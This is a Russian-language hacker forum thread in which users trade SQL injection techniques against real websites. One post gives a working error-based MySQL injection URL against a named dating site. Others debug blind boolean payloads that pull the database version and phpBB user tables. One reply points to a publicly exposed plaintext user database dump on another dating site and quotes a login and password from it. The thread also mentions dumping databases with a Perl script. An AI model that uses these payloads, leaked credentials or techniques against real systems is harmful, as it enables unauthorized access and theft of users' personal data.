да возможно, сливал уже через скули. Отдельный многопоточный скрипт на перле решил мою проблему. если что могу помочь пиши асю в пм.
лови http://www.singles-4you.de/im_show.php?rid=111222'+and+'1'='1'))+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
осматривал сайт на sql иньекцию ничего не нашёл в а админке набрал логин и пароль как ' выдало сообщение об mysql ошибке кто что думает? такое может отображаться при дырке или реагирует на кавычку так? вводя другие логины с паролем ошибки нет
завязывай с милыми наездами я знаю что это пост запрос дело в том что ошибка только при кавычке а вот при запросе 3-1 странички все одинаковые т.к там особо то и нет ничего по чём можно определить различие страниц, поле логин и пароль
Немножко не по теме, извините! Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...
http://whois.domaintools.com/inj3ct0r.com Note: This Domain Name is Suspended. In this status the domain name is InActive and will not function.
делаю запрос (id*IF(ASCII(SUBSTRING(version(),1,1))=53,1,-1)) все ок, ясно что версия 5 но когда пытаюсь выбрать из базы: (id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1,1))=53,1,-1)) вылазит ошибка Invalid SQL: SELECT * FROM `arts` WHERE id = (id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1,1))=53,1,-1)) Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select+1+from+phpbb_users,1,1))=53,1,-1))' at line 1 в чем проблема?
InferNo23 подзапрос select надо взять в скобки SUBSTRING((select+1+from+phpbb_users+limit+0,1),1 ,1))=53,1,-1))
(id*IF(ASCII(SUBSTRING((select+1+from+phpbb_users+limit+0,1),1,1))=53,1,-1)) теперь You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+phpbb_users+limit+0,1),1,1))=53,1,-1))' at line 1
Вродь дернули на 1337db.com, но сайт тоже не отвечает. Следите за ихним твиттером, возможно, объявятся еще.
InferNo23 так закрытыми глазами ниче сказать не могу, если не жалко скинь сайт, посмотрим. ах да забыл сказать, если там видна ошибка мускула, ты не пробовал проводить error based иньекцию? зачем посимвольно..
http://www.tringuladating.com//db/ Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.
странно- там дамп БД юзерей в плейнтексте trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone ,у большинства пароль просто password из чего делаем вывод что наполнял его сам админ и больше полофины юзерей- фейки
А чем и как правильно скачать? Он то и блокнотом открывается, но как то в перемешку, как его обработать?
тебе сколько лет дитё? распечатай на принтере все, раз дамп открыть не можешь ЗЫ. потом маркером будешь подчеркивать, зеленым логины и красным пароли..
